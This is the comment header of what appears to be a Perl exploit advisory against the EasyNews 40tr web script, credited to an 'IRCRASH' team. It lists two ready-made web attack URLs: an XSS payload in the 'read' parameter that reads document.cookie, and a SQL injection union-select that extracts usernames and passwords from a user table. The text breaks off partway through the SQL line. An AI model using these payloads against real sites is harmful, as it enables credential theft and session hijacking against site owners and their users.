1 #!/usr/bin/perl
2 #####################################################################################
3 #### EasyNews−40tr ####
4 #### Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS/LFI) ####
5 #####################################################################################
6 # #
7 #Discovered by : IRCRASH By Dr.Crash #
8 #Exploited By : Dr.Crash #
9 #IRCRASH Team Members : Dr.Crash − Malc0de − R3d.w0rm #
10 # #
11 #####################################################################################
12 # #
13 #Script Download : http://myiosoft.com/download/EasyNews/easynews−40tr.zip #
14 # #
15 #####################################################################################
16 # < XSS > #
17 #XSS Address : http://Sitename/staticpages/easypublish/index.php?PageSection=0&page=individual&table=edp_pupublish&re
ad=<script>alert(document.cookie);</script>
18 # #
19 #####################################################################################
20 # < SQL > #
21 #SQL Address : http://Sitename/dynamicpages/index.php?PageSection=7&page=individual&table=edp_Help_Internal_News&read
=1+union+all+select+1,2,3,4,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword
,0x3c656e64706173733e),6+from+ed